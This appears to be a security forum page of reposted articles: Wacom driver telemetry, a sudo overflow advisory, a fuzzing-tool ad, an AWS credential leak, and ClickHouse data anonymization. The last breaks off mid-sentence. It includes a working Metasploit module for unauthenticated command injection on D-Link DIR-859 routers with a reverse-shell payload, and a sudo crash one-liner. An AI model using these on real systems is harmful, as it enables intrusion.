Jump to content

Fi8sVrs

Active Members
  • Posts

    3206
  • Joined

  • Days Won

    87

Everything posted by Fi8sVrs

  1. Chapter 1: The discovery I have a Wacom drawing tablet. I use it to draw cover illustrations for my blog posts, such as this one: Last week I set up my tablet on my new laptop. As part of installing its drivers I was asked to accept Wacom’s privacy policy. Being a mostly-normal person I never usually read privacy policies. Instead I vigorously hammer the “yes” button in an effort to reach the game, machine, or medical advice on the other side of the agreement as fast as possible. But Wacom’s request made me pause. Why does a device that is essentially a mouse need a privacy policy? I wondered. Sensing skullduggery, I decided to make an exception to my anti-privacy-policy-policy and give this one a read. In Wacom’s defense (that’s the only time you’re going to see that phrase today), the document was short and clear, although as we’ll see it wasn’t entirely open about its more dubious intentions (here’s the full text). In addition, despite its attempts to look like the kind of compulsory agreement that must be accepted in order to unlock the product behind it, as far as I can tell anyone with the presence of mind to decline it could do so with no adverse consequences. With that attempt at even-handedness out the way, let’s get kicking. In section 3.1 of their privacy policy, Wacom wondered if it would be OK if they sent a few bits and bobs of data from my computer to Google Analytics, “[including] aggregate usage data, technical session information and information about [my] hardware device.” The half of my heart that cares about privacy sank. The other half of my heart, the half that enjoys snooping on snoopers and figuring out what they’re up to, leapt. It was a disjointed feeling, probably similar to how it feels to get mugged by your favorite TV magician. Wacom didn’t say exactly what data they were going to send themselves. I resolved to find out. Chapter 2: Snooping on the snoopers I began my investigation with a strong presumption of chicanery. I was unable to imagine the project kickoff meeting in which Wacom decided to bundle Google Analytics with their device, which - remember - is essentially a mouse, but managed to restrain themselves from also grabbing some deliciously intrusive information while they were at it. I Googled “wacom google analytics”. There were a couple of Tweets and Reddit posts made by people who had also read Wacom’s privacy policy and been unhappy about its contents, but no one had yet tried to find out exactly what data Wacom were grabbing. No one had investigated Wacom’s understanding of the phrase “aggregate usage data” or whether it was anywhere near that of a reasonable person. I told my son to clear my schedule. He bashed two wooden blocks together in understanding, encouragement, and sheer admiration. In order to see what type of data Wacom was exfiltrating from my computer, I needed to snoop on the traffic that their driver was sending to Google Analytics. The most common way to do this is to set up a proxy server on your computer (I usually use Burp Suite). You tell your target program to send its traffic through your proxy. Your proxy logs the data it receives, and finally re-sends it on to its intended destination. When the destination sends back a response, the same process runs in reverse. +-------------------------------+ |My computer | | | | +------+ +------+ | +---------+ | |Wacom +------->+Burp +-------->+Google | | |Driver+<-------+Suite +<--------+Analytics| | +------+ +-+----+ | +---------+ | | Log requests and responses | v | | /track?data=... | | | +---------------------+---------+ Some applications, like web browsers, co-operate very well with proxies. They allow users to explicitly specify a proxy for them to to send their traffic through. However, other applications (including the Wacom tablet drivers) provide no such conveniences. Instead, they require some special treatment. Chapter 3: Wireshark I started with a simple approach that was unlikely to work but was worth a try. I opened Wireshark, a program that watches your computer’s network traffic. I wanted to use Wireshark to view the raw bytes that the Wacom driver was sending to Google Analytics. If Wacom was sending my data over unencrypted HTTP then I’d immediately be able to see all of its gory details, no extra work required. On the other hand, if Wacom was using encrypted TLS/HTTPS then I would be foiled. The traffic would appear as garbled nonsense that I would be unable to decrypt, since I wouldn’t know the keys used to encrypt it. I closed any noisy, network-connecting programs to reduce the chatter on the line, pressed Wireshark’s record button, and held onto my hat. Unfortunately, no unencrypted HTTP traffic appeared; only encrypted, garbled TLS. But there was good news amidst this setback. Wireshark also picks up DNS requests, which are used to look up the IP address that corresponds to a domain. I saw that my computer was making DNS requests to look up the IP address of www.google-analytics.com. The DNS response was coming back as 172.217.7.14, and lots of TLS-encrypted traffic was then heading out to that IP address. This meant that something was indeed talking to Google Analytics. I switched tactics and fired up Burp Suite proxy. Chapter 4: Burp Suite I now had two problems. First, I needed to persuade Wacom to send its Google Analytics traffic through Burp Suite. Second, I needed to make sure that Wacom would then complete a TLS handshake with Burp. To solve the first problem, I configured my laptop’s global HTTP and HTTPS proxies to point to Burp Suite. This meant that every program that respected these global settings would send its traffic through my proxy. Happily, it turned out that Wacom did respect my global proxy settings - my proxy quickly started logging “client failed TLS handshake” messages. This brought me to my second problem. Since Wacom was talking to Google Analytics over TLS, it required the server to present a valid TLS certificate for www.google-analytics.com. As far as Wacom is concerned, my proxy was now the server that it is talking to, not Google Analytics itself. This meant that I needed my proxy to present a certificate that Wacom would trust. (Burp must present a valid cert for www.google-analytics.com) | +---------------------|---------+ |My computer | | | v | | +------+ +------+ | +---------+ | |Wacom +------->+Burp +-------->+Google | | |Driver+<-------+Suite +<--------+Analytics| | +------+ +-+----+ | +---------+ | | Log requests and responses | v | | /track?data=... | | | +---------------------+---------+ The most difficult part of presenting such a certificate is that it needs to be cryptographically signed by a certificate authority that the program trusts. Burp Suite can generate and sign certificates for any domain, no problem, but since by default no computer or program trusts Burp Suite as a certificate authority, the certificates it signs are rejected (I’ve written much more about TLS and HTTPS here and here). Once again, the process of persuading a web browser to trust Burp’s root certificate is well-documented, but for a thick application like Wacom I’d need to do something slightly different. I therefore used OSX’s Keychain to temporarily add Burp’s certificate to my computer’s list of root certificates. I assumed that Wacom would load its list of root certificates from my computer, and that by adding Burp to this list, Wacom would start to trust Burp and would complete a TLS handshake with my proxy. I sat and waited. I watched Wireshark and Burp at the same time. If Wacom failed to connect to Burp, I’d see this failure in Wireshark. I was quite excited. Nothing happened. I wondered if the data dumping was triggered by a timer, or by some particular activity, or by both. I tried drawing something using my Wacom tablet. Still nothing. I plugged and unplugged it. Nothing. Then I went into the Wacom Driver Settings and restarted the driver. Everything happened. When I restarted the Wacom driver, rather than lose all the data it had accumulated, the driver fired off everything it had collected to Google Analytics. This data materialized in my Burp Suite. I took a look. My heart experienced the same half-down-half-up schism as it had half an hour ago. Some of the events that Wacom were recording were arguably within their purview, such as “driver started” and “driver shutdown”. I still don’t want them to take this information because there’s nothing in it for me, but their attempt to do so feels broadly justifiable. What requires more explanation is why Wacom think it’s acceptable to record every time I open a new application, including the time, a string that presumably uniquely identifies me, and the application’s name. Chapter 5: Analysis I suspect that Wacom doesn’t really think that it’s acceptable to record the name of every application I open on my personal laptop. I suspect that this is why their privacy policy doesn’t really admit that this is what that they do. I imagine that if pressed they would argue that the name of every application I open on my personal laptop falls into one of their broad buckets like “aggregate data” or “technical session information”, although it’s not immediately obvious to me which bucket. It’s well-known that no one reads privacy policies and that they’re often a fig leaf of consent at best. But since Wacom’s privacy policy makes no mention of their intention to record the name of every application I open on my personal laptop, I’d argue that it doesn’t even give them the technical-fig-leaf-right to do so. In fact, I’d argue that even if someone had read and understood Wacom’s privacy policy, and had knowingly consented to a reasonable interpretation of the words inside it, that person would still not have agreed to allow Wacom to log and track the name of every application that they opened on their personal laptop. Of course, I’m not a lawyer, and I assume that whoever wrote this privacy policy is. Wacom’s privacy policy does say that they only want this data for product development purposes, and on this point I do actually believe them. This might be naive, since who knows what goes on behind the scenes when large troves of data are involved. Either way, while I do understand that product developers like to have usage data in order to monitor and improve their offerings, this doesn’t give them the right to take it. I care about this for two reasons. The first is a principled fuck you. I don’t care whether anything materially bad will or won’t happen as a consequence of Wacom taking this data from me. I simply resent the fact that they’re doing it. The second is that we can also come up with scenarios that involve real harms. Maybe the very existence of a program is secret or sensitive information. What if a Wacom employee suddenly starts seeing entries spring up for “Half Life 3 Test Build”? Obviously I don’t care about the secrecy of Valve’s new games, but I assume that Valve does. We can get more subtle. I personally use Google Analytics to track visitors to my website. I do feel bad about this, but I’ve got to get my self-esteem from somewhere. Google Analytics has a “User Explorer” tool, in which you can zoom in on the activity of a specific user. Suppose that someone at Wacom “fingerprints” a target person that they knew in real life by seeing that this person uses a very particular combination of applications. The Wacom employee then uses this fingerprint to find the person in the “User Explorer” tool. Finally the Wacom employee sees that their target also uses “LivingWith: Cancer Support”. Remember, this information is coming from a device that is essentially a mouse. This example is admittedly a little contrived, but it’s also an illustration that, even though this data doesn’t come with a name and social security number attached, it is neither benign nor inert. Chapter 6: Conclusion In some ways it feels unfair to single out Wacom. This isn’t the dataset that’s going to complete the embrace of full, totalitarian surveillance capitalism. Nonetheless, it’s still deeply obnoxious. A device that is essentially a mouse has no legitimate reasons to make HTTP requests of any sort. Maybe Wacom could hide in the sweet safety of murky territory if they released some sort of mobile app integration or a weekly personal usage report that required this data, but until then I’m happy to classify them as an obligingly clear case of nefariousness. Nonetheless, I’m not about to incinerate my Wacom tablet and buy a different one. These things are expensive, and privacy is hard to put a price on. If you too have a Wacom tablet (presumably this tracking is enabled for all of their models), open up the “Wacom Desktop Center” and click around until you find a way to disable the “Wacom Experience Program”. Then the next time you’re buying a tablet, remember that Wacom tries to track every app you open, and consider giving another brand a go. Epilogue I finished the first draft of this article three weeks ago. I set up Burp Suite proxy again so that I could grab some final screenshots of the data that Wacom was purloining. I restarted the Wacom driver, as per usual. But nothing happened. Wacom weren’t illegitimately siphoning off my personal usage data any more. The bastards. I contemplated pretending I hadn’t seen this and publishing my post anyway. Then I contemplated publishing it with an additional coda explaining this latest development. However, the title “Wacom drawing tablets used to track the name of every application that you open but now seem to have stopped for some reason” didn’t feel very snappy. I decided to do some more investigating. I had previously noticed that, before sending data to Google Analytics, the Wacom driver sent a HEAD request to the URL http://link.wacom.com/analytics/analytics.xml. I hadn’t been able to work out why, and until now I hadn’t thought much of it. However, now Wacom was responding to this request with a 404 “Not Found” status code instead of 200 “OK”. I realized that the request must be some kind of pre-flight check that allowed Wacom to turn off analytics collection remotely without requiring users to install a driver update. Now that the request was failing, Wacom were not sending themselves my data. I dug around in the driver’s logfile and found the following snippet that confirmed my suspicions: I wondered if Wacom had gotten wise to what I was up to and panic-disabled their tracking. This seemed unlikely, although the timing was rather coincidental. I decided that Wacom had probably simply made a boneheaded mistake and accidentally broken their own command-and-control center. I impatiently waited for them to realize their goof and bring their data exfiltration operation back online. I contemplated emailing Wacom to alert them to their problem, but couldn’t come up with a sufficiently innocuous way of doing so. I decided to wait until the end of the month before doing anything, in case the data was used for generating monthly reports. I hoped that on January 31st Wacom would notice that their graphs were broken and bring their system back online. On February 3rd I checked in and was elated at what I saw: I had no idea who Rick was, but I was glad he was back. Wacom were illegitimately siphoning off my personal data again, and I couldn’t be happier. I grabbed some better screenshots, fixed some grammar, and hit publish. The rest is history. Source
  2. # Title: Sudo 1.8.25p - Buffer Overflow # Author: Joe Vennix # Software: Sudo # Versions: Sudo versions prior to 1.8.26 # CVE: CVE-2019-18634 # Reference: https://www.sudo.ws/alerts/pwfeedback.html # Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting # their password. For each key press, an asterisk is printed. This option was added in # response to user confusion over how the standard Password: prompt disables the echoing # of key presses. While pwfeedback is not enabled by default in the upstream version of sudo, # some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files. # Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow. # This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled. The folowing sudoers configuration is vulnerable: $ sudo -l Matching Defaults entries for millert on linux-build: insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail User millert may run the following commands on linux-build: (ALL : ALL) ALL # Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled. # The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password. $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id Password: Segmentation fault If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account. # 0day.today [2020-02-05] # Source
  3. Maavi is a fuzzing tool that scans for vulnerabilities with obfuscated payloads. Has proxy support, records full history of actions, and has various bells and whistles. # Maavi - Next level concept with Swiss Knife Powers - Complete Automated Cross Platform Fuzzing and Vulnerability Assessment Suite # License - EULA # ScreenShots <div align="center"> <img src="https://i.ibb.co/qgc13zK/m1.png"</img> </div> <div align="center"> <img src="https://i.ibb.co/RNF4Jdw/m2.png"</img> </div> <div align="center"> <img src="https://i.ibb.co/GJPzmG8/m4.png"</img> </div> <div align="center"> <img src="https://i.ibb.co/L8FX4Qy/m5.png"</img> </div> # Video - https://m.facebook.com/story.php?story_fbid=499162314119947&id=329284291107751 # Brief Introduction - This is all in one tool for common to advanced to OWASP TOP 10 Vulnerabilities to obfuscated payloads identifcation - It saves time and provide true results and shows what kind of dangers is lurking into your web &/or paramter # Proxy suport - Automatically configured to run test on any website using Tor power - Settings are automatically handled # Vulnerablities Assessment - Automatically scan/fuzz for common to Advanced Vulnerabilities to OWASP TOP 10 Vulnerabilities for - PHP - Obfuscated strings - Buffer Overflows - SSI - COMMAND/TEMPLATE INJECTIONS - LFI,RFI - SQL - ENCODED - Base 64 ENCODE - HEXA DECIMENAL ENCODE - SINGLE TO DOUBLE ENCODE - OBFUSCATION ENCODE - More.... # Parameters, Web, Dom, Directory - Maavi can work on anything including DOM # Cross Site Scripting Assessment - Notifies if any ordinary xss, xss obfuscated, advanced payloads, or waf bypass payloads, reflections are found # Payloads - Add, Remove common to advanced to owasp top 10 to obfuscated payloads - Where other software fails to inject advanced payloads or manually inject your payloads, Maavi will work! # Recorder - Complete history for successful payloads - Complete history for unsuccessful payloads - Complete history for bypassed payloads - Complete history for blocked payloads # Fine Tune - Fine tune your payloads and inject # Installation - chmod u+x * ./installer.sh # Run - ./maavi.sh # Donate - Send request to mrharoonawan@gmail.com # Contact - mrharoonawan@gmail.com Download: maavi-master.zip (18.6 KB) Source
  4. D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution', 'Description' => %q{ D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials. }, 'Author' => [ 'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit 'Pablo Pollanco P.' # Vulnerability discovery and metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2019-17621' ], [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ] ], 'DisclosureDate' => 'Dec 24 2019', 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget', 'RPORT' => '49152' }, 'Targets' => [ [ 'Automatic', { } ], ], 'CmdStagerFlavor' => %w{ echo wget }, 'DefaultTarget' => 0, )) end def execute_command(cmd, opts) callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s + ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s + "/" + Rex::Text.rand_text_alpha(3..12) begin send_request_raw({ 'uri' => "/gena.cgi?service=`#{cmd}`", 'method' => 'SUBSCRIBE', 'headers' => { 'Callback' => "<#{callback_uri}>", 'NT' => 'upnp:event', 'Timeout' => 'Second-1800', }, }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice") end end def exploit execute_cmdstager(linemax: 500) end end # 0day.today [2020-01-24] # Source: 0day.today
  5. An Amazon Web Services (AWS) engineer last week inadvertently made public almost a gigabyte’s worth of sensitive data, including their own personal documents as well as passwords and cryptographic keys to various AWS environments. While these kinds of leaks are not unusual or special, what is noteworthy here is how quickly the employee’s credentials were recovered by a third party, who—to the employee’s good fortune, perhaps—immediately warned the company. On the morning of January 13, an AWS employee, identified as a DevOps Cloud Engineer on LinkedIn, committed nearly a gigabyte’s worth of data to a personal GitHub repository bearing their own name. Roughly 30 minutes later, Greg Pollock, vice president of product at UpGuard, a California-based security firm, received a notification about a potential leak from a detection engine pointing to the repo. An analyst began working to verify what specifically had triggered the alert. Around two hours later, Pollock was convinced the data had been committed to the repo inadvertently and might pose a threat to the employee, if not AWS itself. “In reviewing this publicly accessible data, I have come to the conclusion that data stemming from your company, of some level of sensitivity, is present and exposed to the public internet,” he told AWS by email. AWS responded gratefully about four hours later and the repo was suddenly offline. Since UpGuard’s analysts didn’t test the credentials themselves—which would have been illegal—it’s unclear what precisely they grant access to. An AWS spokesperson told Gizmodo on Wednesday that all of the files were personal in nature, unrelated to the employee’s work. However, at least some of the documents in the cache are labeled “Amazon Confidential.” Alongside those documents are AWS and RSA key pairs, some of which are marked “mock” or “test.” Others, however, are marked “admin” and “cloud.” Another is labeled “rootkey,” suggesting it provides privileged control of a system. Other passwords are connected to mail services. And there are numerous of auth tokens and API keys for a variety of third-party products. AWS did not provide Gizmodo with an on-the-record statement. It is possible that GitHub would have eventually alerted AWS that this data was public. The site itself automatically scans public repositories for credentials issued by a specific list of companies, just as UpGuard was doing. Had GitHub been the one to detect the AWS credentials, it would have, hypothetically, alerted AWS. AWS would have then taken “appropriate action,” possibly by revoking the keys. But not all of the credentials leaked by the AWS employee are detected by GitHub, which only looks for specific types of tokens issued by certain companies. The speed with which UpGuard’s automated software was able to locate the keys also raises concerns about what other organizations have this capability; surely many of the world’s intelligence agencies are among them. GitHub’s efforts to identify the leaked credentials its users upload—which began in earnest around five years ago—received scrutiny last year after a study at North Carolina State University (NCSU) unearthed over 100,000 repositories hosting API tokens and keys. (Notably, the researchers only examined 13 percent of all public repositories, which alone included billions of files.) While Amazon access key IDs and auth tokens were among the data examined by the NCSU researchers, a majority of the leaked credentials were linked to Google services. GitHub did not respond to a request for comment. UpGuard says it chose to make the incident known to demonstrate the importance of early detection and underscore that cloud security is not invulnerable to human error. In this case, Pollock added, there’s no evidence that the engineer acted maliciously or that any customer data was affected. “Rather, this case illustrates the value of rapid data leaks detection to prevent small accidents from becoming larger incidents.” Via https://gizmodo.com/amazon-engineer-leaked-private-encryption-keys-outside-1841160934
  6. ClickHouse users already know that its biggest advantage is its high-speed processing of analytical queries. But claims like this need to be confirmed with reliable performance testing. That's what we want to talk about today. We started running tests in 2013, long before the product was available as open source. Back then, just like now, our main concern was data processing speed in Yandex.Metrica. We had been storing that data in ClickHouse since January of 2009. Part of the data had been written to a database starting in 2012, and part was converted from OLAPServer and Metrage (data structures previously used by Yandex.Metrica). For testing, we took the first subset at random from data for 1 billion pageviews. Yandex.Metrica didn't have any queries at that point, so we came up with queries that interested us, using all the possible ways to filter, aggregate, and sort the data. ClickHouse performance was compared with similar systems like Vertica and MonetDB. To avoid bias, testing was performed by an employee who hadn't participated in ClickHouse development, and special cases in the code were not optimized until all the results were obtained. We used the same approach to get a data set for functional testing. After ClickHouse was released as open source in 2016, people began questioning these tests. Shortcomings of tests on private data Our performance tests: Can't be reproduced independently because they use private data that can't be published. Some of the functional tests are not available to external users for the same reason. Need further development. The set of tests needs to be substantially expanded in order to isolate performance changes in individual parts of the system. Don't run on a per-commit basis or for individual pull requests. External developers can't check their code for performance regressions. We could solve these problems by throwing out the old tests and writing new ones based on open data, like flight data for the USA and taxi rides in New York. Or we could use benchmarks like TPC-H, TPC-DS, and Star Schema Benchmark. The disadvantage is that this data is very different from Yandex.Metrica data, and we would rather keep the test queries. Why it's important to use real data Performance should only be tested on real data from a production environment. Let's look at some examples. Example 1 Let's say you fill a database with evenly distributed pseudorandom numbers. Data compression isn't going to work in this case, although data compression is essential to analytical databases. There is no silver bullet solution to the challenge of choosing the right compression algorithm and the right way to integrate it into the system, since data compression requires a compromise between the speed of compression and decompression and the potential compression efficiency. But systems that can't compress data are guaranteed losers. If your tests use evenly distributed pseudorandom numbers, this factor is ignored, and the results will be distorted. Bottom line: Test data must have a realistic compression ratio. I covered optimization of ClickHouse data compression algorithms in a previous post. Example 2 Let's say we are interested in the execution speed of this SQL query: SELECT RegionID, uniq(UserID) AS visitors FROM test.hits GROUP BY RegionID ORDER BY visitors DESC LIMIT 10 This is a typical query for Yandex.Metrica. What affects the processing speed? How GROUP BY is executed. Which data structure is used for calculating the uniq aggregate function. How many different RegionIDs there are and how much RAM each state of the uniq function requires. But another important factor is that the amount of data is distributed unevenly between regions. (It probably follows a power law. I put the distribution on a log-log graph, but I can't say for sure.) If this is the case, it is important that the states of the uniq aggregate function with fewer values use very little memory. When there are a lot of different aggregation keys, every single byte counts. How can we get generated data that has all these properties? The obvious solution is to use real data. Many DBMSs implement the HyperLogLog data structure for an approximation of COUNT(DISTINCT), but none of them work very well because this data structure uses a fixed amount of memory. ClickHouse has a function that uses a combination of three different data structures, depending on the size of the data set. Bottom line: Test data must represent distribution properties of the real data well enough, meaning cardinality (number of distinct values per column) and cross-column cardinality (number of different values counted across several different columns). Example 3 Instead of testing the performance of the ClickHouse DBMS, let's take something simpler, like hash tables. For hash tables, it's essential to choose the right hash function. This is not as important for std::unordered_map, because it's a hash table based on chaining and a prime number is used as the array size. The standard library implementation in GCC and Clang uses a trivial hash function as the default hash function for numeric types. However, std::unordered_map is not the best choice when we are looking for maximum speed. With an open-addressing hash table, we can't just use a standard hash function. Choosing the right hash function becomes the deciding factor. It's easy to find hash table performance tests using random data that don't take the hash functions used into account. There are also plenty of hash function tests that focus on the calculation speed and certain quality criteria, even though they ignore the data structures used. But the fact is that hash tables and HyperLogLog require different hash function quality criteria. You can learn more about this in "How hash tables work in ClickHouse" (presentation in Russian). The information is slightly outdated, since it doesn't cover Swiss Tables Challenge Our goal is to obtain data for testing performance that has the same structure as Yandex.Metrica data with all the properties that are important for benchmarks, but in such a way that there remain no traces of real website users in this data. In other words, the data must be anonymized and still preserve: Compression ratio. Cardinality (the number of distinct values). Mutual cardinality between several different columns. Properties of probability distributions that can be used for data modeling (for example, if we believe that regions are distributed according to a power law, then the exponent — the distribution parameter — should be approximately the same for artificial data and for real data). How can we get a similar compression ratio for the data? If LZ4 is used, substrings in binary data must be repeated at approximately the same distance and the repetitions must be approximately the same length. For ZSTD, entropy per byte must also coincide. The ultimate goal is to create a publicly available tool that anyone can use to anonymize their data sets for publication. This would allow us to debug and test performance on other people's data similar to our production data. We would also like the generated data to be interesting. However, these are very loosely-defined requirements and we aren't planning to write up a formal problem statement or specification for this task. . Possible solutions I don't want to make it sound like this problem is particularly important. It was never actually included in planning and no one had intentions to work on it. I just kept hoping that an idea would come up some day, and suddenly I would be in a good mood and be able to put everything else off until later. Explicit probabilistic models The first idea is to take each column in the table and find a family of probability distributions that models it, then adjust parameters based on the data statistics (model fitting) and use the resulting distribution to generate new data. A pseudorandom number generator with a predefined seed could be used to get a reproducible result. Markov chains could be used for text fields. This is a familiar model that could be implemented effectively. However, it would require a few tricks: We want to preserve the continuity of time series. This means that for some types of data, we need to model the difference between neighboring values, rather than the value itself. To model "joint cardinality" of columns we will also have to explicitly reflect dependencies between columns. For instance, there are usually very few IP addresses per user ID, so to generate an IP address we would use a hash value of the user ID as a seed and also add a small amount of other pseudorandom data. We aren't sure how to express the dependency that the same user frequently visits URLs with matching domains at approximately the same time. All this can be written in a C++ "script" with the distributions and dependencies hard coded. However, Markov models are obtained from a combination of statistics with smoothing and adding noise. I started writing a script like this, but after writing explicit models for ten columns, it became unbearably boring — and the "hits" table in Yandex.Metrica had more than 100 columns way back in 2012. EventTime.day(std::discrete_distribution<>({ 0, 0, 13, 30, 0, 14, 42, 5, 6, 31, 17, 0, 0, 0, 0, 23, 10, ...})(random)); EventTime.hour(std::discrete_distribution<>({ 13, 7, 4, 3, 2, 3, 4, 6, 10, 16, 20, 23, 24, 23, 18, 19, 19, ...})(random)); EventTime.minute(std::uniform_int_distribution<UInt8>(0, 59)(random)); EventTime.second(std::uniform_int_distribution<UInt8>(0, 59)(random)); UInt64 UserID = hash(4, powerLaw(5000, 1.1)); UserID = UserID / 10000000000ULL * 10000000000ULL + static_cast<time_t>(EventTime) + UserID % 1000000; random_with_seed.seed(powerLaw(5000, 1.1)); auto get_random_with_seed = [&]{ return random_with_seed(); }; This approach was a failure. If I had tried harder, maybe the script would be ready by now. Advantages: Conceptual simplicity. Disadvantages: Large amount of work required. The solution only applies to one type of data. And I would prefer a more general solution that can be used for Yandex.Metrica data as well as for obfuscating any other data. In any case, this solution could be improved. Instead of manually selecting models, we could implement a catalog of models and choose the best among them (best fit plus some form of regularization). Or maybe we could use Markov models for all types of fields, not just for text. Dependencies between data could also be extracted automatically. This would require calculating the relative entropy (relative amount of information) between columns. A simpler alternative is to calculate relative cardinalities for each pair of columns (something like "how many different values of A are there on average for a fixed value B"). For instance, this will make it clear that URLDomain fully depends on the URL, and not vice versa. But I rejected this idea as well, because there are too many factors to consider and it would take too long to write. Neural networks As I've already mentioned, this task wasn't high on the priority list — no one was even thinking about trying to solve it. But as luck would have it, our colleague Ivan Puzirevsky was teaching at the Higher School of Economics. He asked me if I had any interesting problems that would work as suitable thesis topics for his students. When I offered him this one, he assured me it had potential. So I handed this challenge off to a nice guy "off the street" Sharif (he did have to sign an NDA to access the data, though). I shared all my ideas with him but emphasized that there were no restrictions on how the problem could be solved, and a good option would be to try approaches that I know nothing about, like using LSTM to generate a text dump of data. This seemed promising after coming across the article The Unreasonable Effectiveness of Recurrent Neural Networks. The first challenge is that we need to generate structured data, not just text. But it wasn't clear whether a recurrent neural network could generate data with the desired structure. There are two ways to solve this. The first solution is to use separate models for generating the structure and the "filler" and only use the neural network for generating values. But this approach was postponed and then never completed. The second solution is to simply generate a TSV dump as text. Experience has shown that some of the rows in the text won't match the structure, but these rows can be thrown out when loading the data. The second challenge is that the recurrent neural network generates a sequence of data, and thus dependencies in data must follow in the order of the sequence. But in our data, the order of columns can potentially be in reverse to dependencies between them. We didn't do anything to resolve this problem. As summer approached, we had the first working Python script that generated data. The data quality seemed decent at first glance: However, we did run into some difficulties: The size of the model is about a gigabyte. We tried to create a model for data that was several gigabytes in size (for a start). The fact that the resulting model is so large raises concerns. Would it be possible to extract the real data that it was trained on? Unlikely. But I don't know much about machine learning and neural networks, and I haven't read this developer's Python code, so how can I be sure? There were several articles published at the time about how to compress neural networks without loss of quality, but it wasn't implemented. On the one hand, this doesn't seem to be a serious problem, since we can opt out of publishing the model and just publish the generated data. On the other hand, if overfitting occurs, the generated data may contain some part of the source data. On a machine with a single CPU, the data generation speed is approximately 100 rows per second. Our goal was to generate at least a billion rows. Calculations showed that this wouldn't be completed before the date of the thesis defense. It didn't make sense to use additional hardware, because the goal was to make a data generation tool that could be used by anyone. Sharif tried to analyze the quality of data by comparing statistics. Among other things, he calculated the frequency of different characters occurring in the source data and in the generated data. The result was stunning: the most frequent characters were Ð and Ñ. Don't worry about Sharif, though. He successfully defended his thesis and then we happily forgot about the whole thing. Mutation of compressed data Let's assume that the problem statement has been reduced to a single point: we need to generate data that has the same compression ratio as the source data, and the data must decompress at the same speed. How can we achieve this? We need to edit compressed data bytes directly! This allows us to change the data without changing the size of the compressed data, plus everything will work fast. I wanted to try out this idea right away, despite the fact that the problem it solves is not the same one we started with. But that's how it always is. So how do we edit a compressed file? Let's say we are only interested in LZ4. LZ4 compressed data is composed of sequences, which in turn are strings of not-compressed bytes (literals), followed by a match copy: Literals (copy the following N bytes as is). Matches with a minimum repeat length of 4 (repeat N bytes that were in the file at a distance of M). Source data: Hello world Hello. Compressed data (arbitrary example): literals 12 "Hello world " match 5 12. In the compressed file, we leave "match" as-is, and change the byte values in "literals". As a result, after decompressing, we get a file in which all repeating sequences at least 4 bytes long are also repeated at the same distance, but they consist of a different set of bytes (basically, the modified file doesn't contain a single byte that was taken from the source file). But how do we change the bytes? The answer isn't obvious, because in addition to the column types, the data also has its own internal, implicit structure that we would like to preserve. For example, text is often stored in UTF-8 encoding, and we want the generated data to also be valid UTF-8. I developed a simple heuristic that involves meeting several criteria: Null bytes and ASCII control characters are kept as-is. Some punctuation characters remains as-is. ASCII is converted to ASCII and for everything else the most significant bit is preserved (or an explicit set of "if" statements is written for different UTF-8 lengths). In one byte class a new value is picked uniformly at random. Fragments like https:// are preserved, otherwise it looks a bit silly. The only caveat to this approach is that the data model is the source data itself, which means it cannot be published. The model is only fit for generating amounts of data no larger than the source. On the contrary, the previous approaches provide models which allow generating data of arbitrary size. Example for a URL: http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXeAyAx http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac http://ljc.she/kdoqdqwpgafe/klwlpm&qw=962788775I0E7bs7OXe http://ljc.she/kdoqdqwdffhant.am/wcpoyodjit/cbytjgeoocvdtclac http://ljc.she/kdoqdqwdbknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu_qxht http://ljc.she/kdoqdqw-bknvj.s/hmqhpsavon.yf#aortxqdvjja http://ljc.she/kdoqdqwpdtu-Unu-Rjanjna-bbcohu-702130 The results were positive and the data was interesting, but something wasn't quite right. The URLs kept the same structure, but in some of them it was too easy to recognize "yandex" or "avito" (a popular marketplace in Russia), so I created a heuristic that swaps some of the bytes around. There were other concerns as well. For example, sensitive information could possibly reside in a FixedString column in binary representation and potentially consists of ASCII control characters and punctuation, which I decided to preserve. However, I didn't take data types into consideration. Another problem is that if a column stores data in the "length, value" format (this is how String columns are stored), how do I ensure that the length remains correct after the mutation? When I tried to fix this, I immediately lost interest. Random permutations Unfortunately, the problem wasn't solved. We performed a few experiments, and it just got worse. The only thing left was to sit around doing nothing and surf the web randomly, since the magic was gone. Luckily, I came across a page thatl expained the algorithm for rendering the death of the main character in the game Wolfenstein 3D. The animation is really well done — the screen fills up with blood. The article explains 